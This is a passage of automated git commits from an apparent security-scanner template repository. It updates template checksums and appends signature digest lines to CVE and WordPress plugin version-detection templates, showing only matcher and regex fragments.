-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:658b1b735900d8a827395c8ff9ef83528cba2d61 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d6471f781b9662155fc7a9e2e984365df6bdc7c6 -http/technologies/wordpress/plugins/woocommerce-services.yaml:75d84c2ef0329f65fb0e037f3eec4aced61312da -http/technologies/wordpress/plugins/woocommerce.yaml:2b3f706bdc556453999c1c71f0d3d0f0197dbff6 -http/technologies/wordpress/plugins/wordfence.yaml:38d3ba173c391b0caa1978c3861e90de0459d0a9 -http/technologies/wordpress/plugins/wordpress-importer.yaml:3c606b380b15b889824d26556250370f9edc84cc -http/technologies/wordpress/plugins/wordpress-seo.yaml:1c1ab0737f1bdf84ec9c1cb5750d5c782ad3b9a3 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:e9d87857aeda385f37247cbaae1a14bf15d36524 -http/technologies/wordpress/plugins/wp-crontrol.yaml:48c054f88fe88cbd979b7ac455617457192e7cb2 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:e19948582e13819be5e9acf6c1d3765c3de5a704 -http/technologies/wordpress/plugins/wp-file-manager.yaml:4cf658db32d312c63cf6b5715d4a6cea2b33d9dc -http/technologies/wordpress/plugins/wp-google-maps.yaml:49221388455f512da573ed4cdd4df1f184868f6a -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:1df9e28e73d982b1a509996ba10b5b03bae1d4ea -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:171f72065feaf6cf25491a3353ee6df38e9e6b17 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:1ab1059569a2f9ef5b48112fbccfdf3e7095d3c6 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:cfc8ae16b026af7ad69b9bb07b0a66d13cdbc647 -http/technologies/wordpress/plugins/wp-optimize.yaml:43d82149b10623f2d435788379b578af224e37cc -http/technologies/wordpress/plugins/wp-pagenavi.yaml:90b8467075ce059d05d674367f2729b8082bdb35 -http/technologies/wordpress/plugins/wp-reset.yaml:3641e983d6513970ad8bdf404fdb7cbb208f36f8 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:cb76d98207fa1baf92b33d2be961469f4acddbd7 -http/technologies/wordpress/plugins/wp-rollback.yaml:2af37b20a937ec5a9aa2e4e895165516f3483fdd -http/technologies/wordpress/plugins/wp-seopress.yaml:1dba7cc2c0cf24c564f6aa099ab618d0e93b0001 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:c19ab759a84a756554d6c81f3e24ca58aebb305c -http/technologies/wordpress/plugins/wp-smushit.yaml:834f754e1b911792c082cb1934e014e70db0234c -http/technologies/wordpress/plugins/wp-statistics.yaml:435065cf69fa5db3b04ebedf0a3427df7429972f -http/technologies/wordpress/plugins/wp-super-cache.yaml:04a832caf97532056c95f255f6ea64cd669f9719 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:24f928ba5f4994e6e5492698141edd9c0fbda893 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:47be55a9e105f3bd24c7c77d94fda06f52626c56 -http/technologies/wordpress/plugins/wpforms-lite.yaml:3655b4bdbe80bc61695465e4cdd5f579563c746c -http/technologies/wordpress/plugins/wps-hide-login.yaml:242631b40f523ff13bbe2626bfdd668398b1627d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c64e5fb4d749c84df32fde6adb98b7808861434d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:5d684f1d08b99fe24149050622a3f6ff1ca6a53a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8946,7 +8947,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a3ea9eb00c30bbf5b2abb8425182ddd14ad792fc +templates-checksum.txt:fecee26ddf922dc3ce7a040004bd1d0c6585c416 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From f2dabf64f833c85dc189beb5c10272ddba8ffe09 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 05:36:40 +0000 Subject: [PATCH 1792/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a12fe4daf4..49bc9c58b0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2024/CVE-2024-6366.yaml' - 'http/cves/2024/CVE-2024-6396.yaml' - 'http/cves/2024/CVE-2024-6922.yaml' + - 'http/cves/2024/CVE-2024-7120.yaml' - 'http/cves/2024/CVE-2024-7188.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/misconfiguration/installer/quickcms-installer.yaml' From 31be8581f7d7d6594e1fcce7fc5f46fc7e0e346a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 05:37:35 +0000 Subject: [PATCH 1793/1841] Auto Template Signing [Thu Aug 1 05:37:35 UTC 2024] :robot: --- http/cves/2024/CVE-2024-39907.yaml | 1 + http/cves/2024/CVE-2024-7120.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 202 files changed, 202 insertions(+) diff --git a/http/cves/2024/CVE-2024-39907.yaml b/http/cves/2024/CVE-2024-39907.yaml index 0338b96fb1..b0d3b12ee9 100644 --- a/http/cves/2024/CVE-2024-39907.yaml +++ b/http/cves/2024/CVE-2024-39907.yaml @@ -49,3 +49,4 @@ http: - contains_all(body_2, "SQL logic error","table exp already exists") - contains(header_1, 'psession') condition: and +# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index c874785be6..77db25b31b 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -43,3 +43,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f825ff9aa104f675a7d11ac402b1eb594688591c3cef8dbab4feb41cc065f415022100b74ba964b5441d9580eb432a280ebcd4128fe1cf70e37b61e6855f8405877bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..50b5926d79 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb21c1a47541da16e8bda0d6b7655bac6e4c0501f14293739586047952f741cb0221008e68d88a15b4ea97a4744ffe7ef8235a34b0f2a3e08df42d3e886a9030ee1a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..e9441db46a 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a96ab15ddb89d8065dbf2aaaab430e20d82439033be26c342aaa13ab6b30485d022100d2bebd77742fa09a8178c6ea4cb0434ae71bdd06dbb16aa64844ed35d5909f3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..edbdb7eb55 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f666e6fd4c4a8dc99c92bda47f10e36a8558d666e8eb895a83e1636f89a6a87602200ed373b3a15fe11b1b58d67abaa577d8f8d2f76ed38931c60ea172cc708af9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..444d98e59c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015e0aa337a86699ec98fe00b80b4f3f2f53e8f5a5a86dc2221c348e4f3037db40221008cea985c8f92186bcbf6605558c8fdb9200d9426692101f40ae95ef239c4722b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..292c97c440 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220554eff996af197cd8fbfd6eeefb3959e5dffb907a99939dda5ee543908619b51022024e9187952242074e1cf7995bade104c2496b7cf711f118003a04fd33b349692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..5ff3801337 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e044b71e883a3edb2bc724d1c8d2a269d27475c212d844d67fb85a82eb03ba1c022100e2cd7e62585b6363649103f00656850fb4b03a709c07a41a47bd2995787ba4d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..32c05e8835 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069ffa28f501d1c8c8bc5c2b0ffca5f5712212f3038cd905e9ef62ec94cd792fe02203d6333298e0a1bca424dfb676ea314fb79747549696d2382fd7df8dae793da16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..79ffff7131 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201888151a74948f6f450782d958e7c94aa6fdbd464334df3f38556d6a0c0493d202207340a2f97036e32848bcd2d158b9ab58e451b9bdbc9e99091a6b1393ab29bd9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..bfc5b23669 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200cfd7ea8d09607ce19cb3acc996f8edf04c248af9219f5179981f18cfc58e67b02204617673cd30134d4eb6009ff9dc057e466ab06d1c0937a1a936504a11346655d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..9447eefce5 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 